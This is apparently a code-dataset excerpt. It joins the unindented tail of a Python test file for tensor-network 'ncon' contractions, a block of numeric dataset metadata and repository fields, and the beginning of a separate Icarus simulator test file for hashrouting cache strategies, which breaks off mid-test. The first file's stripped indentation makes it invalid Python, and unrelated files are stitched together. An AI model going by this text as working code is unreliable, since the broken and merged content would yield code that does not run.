a = Node(t, backend=backend)
res = ncon_interface.ncon([a], [(-2, -1)], backend=backend)
np.testing.assert_allclose(res.tensor, t.transpose())
def test_outer_product(backend):
if backend == "jax":
pytest.skip("Jax outer product support is currently broken.")
a = np.array([1, 2, 3])
b = np.array([1, 2])
res = ncon_interface.ncon([a, b], [(-1,), (-2,)], backend=backend)
np.testing.assert_allclose(res, np.kron(a, b).reshape((3, 2)))
res = ncon_interface.ncon([a, a, a, a], [(1,), (1,), (2,), (2,)],
backend=backend)
np.testing.assert_allclose(res, 196)
def test_node_outer_product(backend):
if backend == "jax":
pytest.skip("Jax outer product support is currently broken.")
t1 = np.array([1, 2, 3])
t2 = np.array([1, 2])
a = Node(t1, backend=backend)
b = Node(t2, backend=backend)
res = ncon_interface.ncon([a, b], [(-1,), (-2,)], backend=backend)
np.testing.assert_allclose(res.tensor, np.kron(t1, t2).reshape((3, 2)))
res = ncon_interface.ncon([a, a, a, a], [(1,), (1,), (2,), (2,)],
backend=backend)
np.testing.assert_allclose(res.tensor, 196)
def test_trace(backend):
a = np.ones((2, 2))
res = ncon_interface.ncon([a], [(1, 1)], backend=backend)
np.testing.assert_allclose(res, 2)
def test_node_trace(backend):
a = Node(np.ones((2, 2)), backend=backend)
res = ncon_interface.ncon([a], [(1, 1)], backend=backend)
np.testing.assert_allclose(res.tensor, 2)
def test_small_matmul(backend):
a = np.random.randn(2, 2)
b = np.random.randn(2, 2)
res = ncon_interface.ncon([a, b], [(1, -1), (1, -2)], backend=backend)
np.testing.assert_allclose(res, a.transpose() @ b)
def test_node_small_matmul(backend):
t1 = np.random.randn(2, 2)
t2 = np.random.randn(2, 2)
a = Node(t1, backend=backend)
b = Node(t2, backend=backend)
res = ncon_interface.ncon([a, b], [(1, -1), (1, -2)], backend=backend)
np.testing.assert_allclose(res.tensor, t1.transpose() @ t2)
def test_contraction(backend):
a = np.random.randn(2, 2, 2)
res = ncon_interface.ncon([a, a, a], [(-1, 1, 2), (1, 2, 3), (3, -2, -3)],
backend=backend)
res_np = a.reshape((2, 4)) @ a.reshape((4, 2)) @ a.reshape((2, 4))
res_np = res_np.reshape((2, 2, 2))
np.testing.assert_allclose(res, res_np)
def test_node_contraction(backend):
tensor = np.random.randn(2, 2, 2)
a = Node(tensor, backend=backend)
res = ncon_interface.ncon([a, a, a], [(-1, 1, 2), (1, 2, 3), (3, -2, -3)],
backend=backend)
res_np = tensor.reshape((2, 4)) @ tensor.reshape((4, 2)) @ tensor.reshape(
(2, 4))
res_np = res_np.reshape((2, 2, 2))
np.testing.assert_allclose(res.tensor, res_np)
def test_backend_network(backend):
a = np.random.randn(2, 2, 2)
nodes, _, out_edges = ncon_interface.ncon_network(
[a, a, a], [(-1, 1, 2), (1, 2, 3), (3, -2, -3)], backend=backend)
res = greedy(nodes, out_edges).tensor
res_np = a.reshape((2, 4)) @ a.reshape((4, 2)) @ a.reshape((2, 4))
res_np = res_np.reshape((2, 2, 2))
np.testing.assert_allclose(res, res_np)
| 38.084416
| 79
| 0.568201
| 1,651
| 11,730
| 3.918837
| 0.084797
| 0.024111
| 0.136631
| 0.116847
| 0.816229
| 0.810046
| 0.792117
| 0.758733
| 0.744668
| 0.733539
| 0
| 0.050937
| 0.245183
| 11,730
| 307
| 80
| 38.208469
| 0.679806
| 0.047997
| 0
| 0.717949
| 0
| 0
| 0.02116
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.102564
| false
| 0
| 0.021368
| 0
| 0.123932
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a1ef3d5f7eec5d6cac460b65de02c80c1606679
| 83,127
|
py
|
Python
|
icarus/models/strategy/tests/test_strategy.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 5
|
2021-03-20T09:22:55.000Z
|
2021-12-20T17:01:33.000Z
|
icarus/models/strategy/tests/test_strategy.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 1
|
2021-12-13T07:40:46.000Z
|
2021-12-20T16:59:08.000Z
|
icarus/models/strategy/tests/test_strategy.py
|
oascigil/icarus_edge_comp
|
b7bb9f9b8d0f27b4b01469dcba9cfc0c4949d64b
|
[
"MIT"
] | 1
|
2021-11-25T05:42:20.000Z
|
2021-11-25T05:42:20.000Z
|
# -*- coding: utf-8 -*-
import unittest
import fnss
from icarus.scenarios import IcnTopology
import icarus.models as strategy
from icarus.execution import NetworkModel, NetworkView, NetworkController, DummyCollector
class TestHashroutingEdge(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
@classmethod
def topology(cls):
#
# 4
# / \
# r ---- 1 -- 2 -- 3 ---- s
#
topology = IcnTopology()
topology.add_path(["r", 1, 2, 3, "s"])
topology.add_path([1, 4, 3])
fnss.add_stack(topology, "r", "receiver")
fnss.add_stack(topology, "s", "source", {'contents': range(1, 61)})
for v in (1, 2, 3, 4):
fnss.add_stack(topology, v, "router", {"cache_size": 4})
topology.graph['icr_candidates'] = set([1, 2, 3, 4])
return topology
def setUp(self):
topology = self.topology()
model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(model)
self.controller = NetworkController(model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
def tearDown(self):
pass
def test_hashrouting_symmetric_edge(self):
hr = strategy.HashroutingEdge(self.view, self.controller, 'SYMM', 0.25)
hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
# At time 1, request content 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4), (4, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 4), (4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Let's request it again to make sure we have hit from edge cache
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1)]
exp_cont_hops = [(1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(1, summary['serving_node'])
# Now request content 6 which should replace 4 in the local cache of 1
# but not 3, because 6 would take space in 3's coordinated ratio
hr.process_event(1, "r", 7, True)
loc = self.view.content_locations(7)
self.assertIn("s", loc)
self.assertIn(3, loc)
self.assertTrue(self.view.local_cache_lookup(1, 7))
self.assertFalse(self.view.local_cache_lookup(2, 7))
self.assertFalse(self.view.local_cache_lookup(3, 7))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 2), (2, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 2), (2, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Verify where 4 is still stored
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
# Request again 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4)]
exp_cont_hops = [(4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
def test_hashrouting_symmetric_edge_zero_local(self):
hr = strategy.HashroutingEdge(self.view, self.controller, 'SYMM', 0)
hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
# At time 1, request content 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4), (4, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 4), (4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Let's request it again to make sure we have hit from edge cache
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4)]
exp_cont_hops = [(4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
# Now request content 6 which should replace 4 in the local cache of 1
# but not 3, because 6 would take space in 3's coordinated ratio
hr.process_event(1, "r", 7, True)
loc = self.view.content_locations(7)
self.assertIn("s", loc)
self.assertIn(3, loc)
self.assertFalse(self.view.local_cache_lookup(1, 7))
self.assertFalse(self.view.local_cache_lookup(2, 7))
self.assertFalse(self.view.local_cache_lookup(3, 7))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 2), (2, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 2), (2, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Verify where 4 is still stored
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
# Request again 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4)]
exp_cont_hops = [(4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
def test_hashrouting_symmetric_edge_zero_coordinated(self):
hr = strategy.HashroutingEdge(self.view, self.controller, 'SYMM', 1)
hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
# At time 1, request content 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertNotIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4), (4, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 4), (4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Let's request it again to make sure we have hit from edge cache
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertNotIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1)]
exp_cont_hops = [(1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(1, summary['serving_node'])
# Now request content 6 which should replace 4 in the local cache of 1
# but not 3, because 6 would take space in 3's coordinated ratio
hr.process_event(1, "r", 7, True)
loc = self.view.content_locations(7)
self.assertIn("s", loc)
self.assertNotIn(3, loc)
self.assertTrue(self.view.local_cache_lookup(1, 7))
self.assertFalse(self.view.local_cache_lookup(2, 7))
self.assertFalse(self.view.local_cache_lookup(3, 7))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 2), (2, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 2), (2, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Verify where 4 is still stored
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
# Request again 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertNotIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1)]
exp_cont_hops = [(1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(1, summary['serving_node'])
class TestHashroutingOnPath(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
@classmethod
def topology(cls):
#
# 4
# / \
# r ---- 1 -- 2 -- 3 ---- s
#
topology = IcnTopology()
topology.add_path(["r", 1, 2, 3, "s"])
topology.add_path([1, 4, 3])
fnss.add_stack(topology, "r", "receiver")
fnss.add_stack(topology, "s", "source", {'contents': range(1, 61)})
for v in (1, 2, 3, 4):
fnss.add_stack(topology, v, "router", {"cache_size": 4})
topology.graph['icr_candidates'] = set([1, 2, 3, 4])
return topology
def setUp(self):
topology = self.topology()
model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(model)
self.controller = NetworkController(model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
def tearDown(self):
pass
def test_hashrouting_symmetric(self):
hr = strategy.HashroutingOnPath(self.view, self.controller, 'SYMM', 0.25)
hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
# At time 1, request content 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertTrue(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4), (4, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 4), (4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Let's request it again to make sure we have hit from edge cache
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertTrue(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1)]
exp_cont_hops = [(1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(1, summary['serving_node'])
# Now request content 7 which should replace 4 in the local cache of 1
# but not 3, because 7 would take space in 3's coordinated ratio
hr.process_event(1, "r", 7, True)
loc = self.view.content_locations(7)
self.assertIn("s", loc)
self.assertIn(3, loc)
self.assertTrue(self.view.local_cache_lookup(1, 7))
self.assertTrue(self.view.local_cache_lookup(2, 7))
self.assertFalse(self.view.local_cache_lookup(3, 7))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 2), (2, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 2), (2, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Verify where 4 is still stored
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertTrue(self.view.local_cache_lookup(3, 4))
# Request again 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertTrue(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4)]
exp_cont_hops = [(4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
def test_hashrouting_symmetric_zero_local(self):
hr = strategy.HashroutingOnPath(self.view, self.controller, 'SYMM', 0)
hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
# At time 1, request content 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4), (4, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 4), (4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Let's request it again to make sure we have hit from edge cache
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4)]
exp_cont_hops = [(4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
# Now request content 6 which should replace 4 in the local cache of 1
# but not 3, because 6 would take space in 3's coordinated ratio
hr.process_event(1, "r", 7, True)
loc = self.view.content_locations(7)
self.assertIn("s", loc)
self.assertIn(3, loc)
self.assertFalse(self.view.local_cache_lookup(1, 7))
self.assertFalse(self.view.local_cache_lookup(2, 7))
self.assertFalse(self.view.local_cache_lookup(3, 7))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 2), (2, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 2), (2, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Verify where 4 is still stored
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
# Request again 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertIn(4, loc)
self.assertFalse(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertFalse(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4)]
exp_cont_hops = [(4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
def test_hashrouting_symmetric_zero_coordinated(self):
hr = strategy.HashroutingOnPath(self.view, self.controller, 'SYMM', 1)
hr.authoritative_cache = lambda x: ((x - 1) % 4) + 1
# At time 1, request content 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertNotIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertTrue(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 4), (4, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 4), (4, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Let's request it again to make sure we have hit from edge cache
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertNotIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertTrue(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1)]
exp_cont_hops = [(1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(1, summary['serving_node'])
# Now request content 6 which should replace 4 in the local cache of 1
# but not 3, because 6 would take space in 3's coordinated ratio
hr.process_event(1, "r", 7, True)
loc = self.view.content_locations(7)
self.assertIn("s", loc)
self.assertNotIn(3, loc)
self.assertTrue(self.view.local_cache_lookup(1, 7))
self.assertTrue(self.view.local_cache_lookup(2, 7))
# Note: this assertion below is false, because we never store items
# for the authoritative cache in the uncoordinated section, even if
# the coordinated cache is empty
self.assertFalse(self.view.local_cache_lookup(3, 7))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1), (1, 2), (2, 3), (3, "s")]
exp_cont_hops = [("s", 3), (3, 2), (2, 1), (1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual("s", summary['serving_node'])
# Verify where 4 is still stored
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertTrue(self.view.local_cache_lookup(3, 4))
# Request again 4
hr.process_event(1, "r", 4, True)
loc = self.view.content_locations(4)
self.assertIn("s", loc)
self.assertNotIn(4, loc)
self.assertTrue(self.view.local_cache_lookup(1, 4))
self.assertFalse(self.view.local_cache_lookup(2, 4))
self.assertTrue(self.view.local_cache_lookup(3, 4))
summary = self.collector.session_summary()
exp_req_hops = [("r", 1)]
exp_cont_hops = [(1, "r")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(1, summary['serving_node'])
class TestHashroutingClustered(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
@classmethod
def clustered_topology(cls):
"""Return topology for testing off-path caching strategies
"""
# Topology sketch
#
# 3 6
# / \ / \
# / \ / \
# RCV ---- 1 ---- 2 -[HIGH_DELAY]--- 4 ---- 5 ---- SRC
#
topology = IcnTopology()
topology.add_path(['RCV', 1, 2, 4, 5, 'SRC'])
topology.add_path([2, 3, 1])
topology.add_path([5, 6, 4])
fnss.set_delays_constant(topology, 1, 'ms')
fnss.set_delays_constant(topology, 15, 'ms', [(2, 4)])
caches = (1, 2, 3, 4, 5, 6)
contents = [1, 2, 3]
clusters = [set([1, 2, 3]), set([4, 5, 6])]
topology.graph['icr_candidates'] = set(caches)
topology.graph['clusters'] = clusters
fnss.add_stack(topology, "RCV", 'receiver', {})
topology.node["RCV"]["cluster"] = 0
fnss.add_stack(topology, "SRC", 'source', {'contents': contents})
topology.node["SRC"]["cluster"] = 1
for v in caches:
fnss.add_stack(topology, v, 'router', {'cache_size': 1})
topology.node[v]["cluster"] = (v - 1) // 3
return topology
def setUp(self):
topology = self.clustered_topology()
self.model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(self.model)
self.controller = NetworkController(self.model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
def tearDown(self):
pass
def test_hashrouting_symmetric_lce(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='SYMM',
inter_routing='LCE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# At time 1, receiver 0 requests content 2
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6), (6, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 6), (6, 4), (4, 2), (2, 3), (3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect hit from first cluster
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3)]
exp_cont_hops = [(3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 3)
# Delete entry on first cluster, expect hit on second cluster
self.model.cache[3].remove(3)
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(3, loc)
self.assertIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6)]
exp_cont_hops = [(6, 4), (4, 2), (2, 3), (3, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], 6)
def test_hashrouting_asymmetric_lce(self):
hr = strategy.HashroutingClustered(self.view, self.controller,
intra_routing='ASYMM',
inter_routing='LCE')
hr.authoritative_cache = lambda x, cluster: cluster * 3 + x
# Expect miss
hr.process_event(1, "RCV", 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 1)
self.assertIn("SRC", loc)
self.assertNotIn(3, loc)
self.assertNotIn(6, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 3), (3, 2), (2, 4), (4, 6), (6, 5), (5, "SRC")]
exp_cont_hops = [("SRC", 5), (5, 4), (4, 2), (2, 1), (1, "RCV")]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(summary['serving_node'], "SRC")
# Expect miss again, but this time caches will be populated
hr.process_event(1, "RCV", 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn("SRC", loc)
self.assertIn(2, loc)
self.assertIn(5, loc)
summary = self.collector.session_summary()
exp_req_hops = [("RCV", 1), (1, 2), (2, 4), (4, 5), (5, 'SRC')]
